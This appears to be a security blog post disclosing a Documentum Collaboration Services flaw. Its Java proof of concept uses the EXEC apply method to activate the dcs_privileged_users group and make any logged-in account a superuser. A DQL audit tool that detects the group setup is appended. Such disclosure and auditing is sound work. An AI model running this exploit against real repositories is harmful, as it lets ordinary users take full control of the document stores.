God bless EMC. Part III

In November 2013 I noted that it is not a good idea to give non-privileged users access to the API Tester component in WDK applications, for the following reasons:

In the latest WDK patches EMC restricted access to the API Tester component, and now only superusers are able to use it:

But I completely missed the fact that Collaboration Services (which are installed by default) create a number of dynamic, non-protected groups:

Call UpdatePrivGroup( "dce_room_creator", "dm_create_group" )
Call UpdatePrivGroup( "dce_create_room_groups", "dm_create_group" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_user" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_cabinet" )
Call UpdatePrivGroup( "dce_datatable_creator", "dm_create_type" )
Call UpdatePrivGroup( "dcs_privileged_users", "dm_superusers" )

Call AddGroupToRole("dce_create_room_groups", "dm_world" )
Call AddGroupToRole("dce_datatable_creator", "dm_world" )
Call AddGroupToRole("dcs_privileged_users", "dm_world" )

Call AddAttributeValueToRole( "dce_datatable_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "is_module_only", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "group_class", "module role" )

Call AddAttributeValueToRole( "dcs_privileged_users", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "is_module_only", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "group_class", "module role" )

Call AddAttributeValueToRole( "dce_room_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_room_creator", "is_module_only", "T" )

Call AddAttributeValueToRole( "dce_create_room_groups", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_create_room_groups", "is_module_only", "T" )
Call AddAttributeValueToRole("dce_create_room_groups", "group_class", "module role")

Call AddAttributeValueToRole( "dce_user_manager", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_user_manager", "is_module_only", "T" )

Call AddGroupAdminToGroup( "dce_create_room_groups", "dce_room_creator" )
Call AddGroupAdminToGroup( "dce_hidden_users", "dce_user_manager" )

This means that in previous releases of WDK applications any user was able to escalate privileges through the API Tester component. Moreover, the WDK fix does not close the hole: dcs_privileged_users is a dynamic group that has dm_world (i.e. every user) as a member and is itself a member of dm_superusers, and nothing stops an ordinary account from activating it. So any user who can connect to the Content Server directly (for example through DFC) can still escalate privileges:

package com.documentum.fc.client.security.impl;

import static java.lang.System.out;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.IDfCollection;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSessionManager;
import com.documentum.fc.common.DfId;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;
import com.documentum.fc.common.IDfLoginInfo;

public class Test {

    // Usage: Test <docbase> <username> <password> [<domain>]
    // The account needs nothing more than the ability to log in to the docbase.
    public static void main(String argv[]) throws Exception {
        String docbase = argv[0];
        String username = argv[1];
        String password = argv[2];
        String domain = null;
        if (argv.length == 4) {
            domain = argv[3];
        }

        IDfSessionManager sessionManager = new DfClient().newSessionManager();
        IDfLoginInfo loginInfo = new DfLoginInfo(username, password);
        if (domain != null) {
            loginInfo.setDomain(domain);
        }
        sessionManager.setIdentity(docbase, loginInfo);
        out.println("Connecting to docbase '" + docbase + "' as '" + username
                + "'");
        IDfSession session = sessionManager.getSession(docbase);
        out.println("Connected");
        try {
            // The EXEC apply method runs the DQL statement in QUERY with the
            // dynamic groups named in __REQUESTED_PROTECTED_ROLES activated for
            // the call. dcs_privileged_users has dm_world as a member and is
            // itself a member of dm_superusers, so the update below executes
            // with superuser privileges and grants the calling account the
            // superuser privilege (user_privileges=16).
            IDfList arguments = new DfList(new String[] {"QUERY",
                "__REQUESTED_PROTECTED_ROLES", });
            IDfList types = new DfList(new String[] {"S", "S", });
            IDfList values = new DfList(
                    new String[] {
                        "update dm_user object set user_privileges=16 where user_name=USER",
                        "dcs_privileged_users", });
            IDfCollection collection = session.apply(DfId.DF_NULLID_STR,
                    "EXEC", arguments, types, values);
            if (collection != null) {
                try {
                    if (collection.next()) {
                        out.println(collection.dump());
                    }
                } finally {
                    collection.close();
                }
            }
        } finally {
            // Hand the session back to the manager instead of leaking it.
            sessionManager.release(session);
        }
    }
}
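The install script above shows the pattern to look for: a dynamic group whose member list contains dm_world and which is itself a member of dm_superusers. The following audit tool is an added example, not code from the original post or from EMC, that searches a repository for that pattern with plain DFC queries. It assumes the dm_group attributes is_dynamic, is_protected and groups_names, and that the dm_world pseudo-group shows up in groups_names after AddGroupToRole; confirm them with DESCRIBE dm_group on your Content Server version before relying on the output. The package and class names are mine.

```java
package example.audit; // hypothetical package, not part of DFC or the original post

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.DfQuery;
import com.documentum.fc.client.IDfCollection;
import com.documentum.fc.client.IDfQuery;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSessionManager;
import com.documentum.fc.common.DfException;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfLoginInfo;

import java.util.ArrayList;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;

public class DynamicGroupAudit {

    // Dynamic groups that are not protected and whose membership includes
    // dm_world, i.e. every authenticated user once the group is activated.
    // Assumption: dm_group.is_protected exists on this server version.
    private static final String DQL_WORLD_DYNAMIC =
            "select group_name from dm_group "
            + "where is_dynamic = 1 and is_protected = 0 "
            + "and any groups_names = 'dm_world'";

    // Groups that are direct members of dm_superusers.
    private static final String DQL_SUPERUSER_GROUPS =
            "select groups_names from dm_group where group_name = 'dm_superusers'";

    // Accounts that already hold the superuser bit (user_privileges = 16);
    // compare this list against the administrative accounts you expect.
    private static final String DQL_SUPERUSER_ACCOUNTS =
            "select user_name from dm_user where user_privileges >= 16";

    // Usage: DynamicGroupAudit <docbase> <username> <password>
    public static void main(String[] argv) throws Exception {
        IDfSessionManager sessionManager = new DfClient().newSessionManager();
        IDfLoginInfo loginInfo = new DfLoginInfo(argv[1], argv[2]);
        sessionManager.setIdentity(argv[0], loginInfo);
        IDfSession session = sessionManager.getSession(argv[0]);
        try {
            Set<String> worldDynamic = queryValues(session, DQL_WORLD_DYNAMIC, "group_name");
            Set<String> superuserGroups = queryValues(session, DQL_SUPERUSER_GROUPS, "groups_names");
            for (String group : escalationPaths(worldDynamic, superuserGroups)) {
                System.out.println("ESCALATION PATH: dm_world -> " + group + " -> dm_superusers");
            }
            for (String group : worldDynamic) {
                if (!superuserGroups.contains(group)) {
                    System.out.println("review: dynamic group open to dm_world: " + group);
                }
            }
            for (String user : queryValues(session, DQL_SUPERUSER_ACCOUNTS, "user_name")) {
                System.out.println("superuser account: " + user);
            }
        } finally {
            sessionManager.release(session);
        }
    }

    /** Groups that everybody can activate and that are direct members of dm_superusers. */
    static List<String> escalationPaths(Set<String> worldDynamic, Set<String> superuserGroups) {
        List<String> paths = new ArrayList<>();
        for (String group : worldDynamic) {
            if (superuserGroups.contains(group)) {
                paths.add(group);
            }
        }
        return paths;
    }

    /** Collects every value of attr from a DQL result, including repeating values. */
    static Set<String> queryValues(IDfSession session, String dql, String attr) throws DfException {
        IDfQuery query = new DfQuery();
        query.setDQL(dql);
        IDfCollection collection = query.execute(session, IDfQuery.DF_READ_QUERY);
        Set<String> values = new LinkedHashSet<>();
        try {
            while (collection.next()) {
                int count = collection.getValueCount(attr);
                for (int i = 0; i < count; i++) {
                    values.add(collection.getRepeatingString(attr, i));
                }
            }
        } finally {
            collection.close();
        }
        return values;
    }
}
```

With Collaboration Services installed at the defaults shown above, the first loop should report dcs_privileged_users. The check only follows direct membership in dm_superusers; a group that reaches dm_superusers or dm_sysadmin through an intermediate group needs the membership walk extended, and the dm_user listing is there to catch accounts that have already been escalated.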

Update

On March 3rd, 2014 EMC announced a fix for TaskSpace (actually they just restricted access to the API Tester); the suggested workaround gives me a lot of fun:

4 thoughts on “God bless EMC. Part III”

  1. Pingback: CVE-2014-0629 strikes back | Documentum in a (nuts)HELL
  2. Pingback: Weird release management | Documentum in a (nuts)HELL
  3. Pingback: D2 remote code execution | Documentum in a (nuts)HELL
  4. Pingback: When will EMC stop fighting with customers and start care about them? | Documentum in a (nuts)HELL
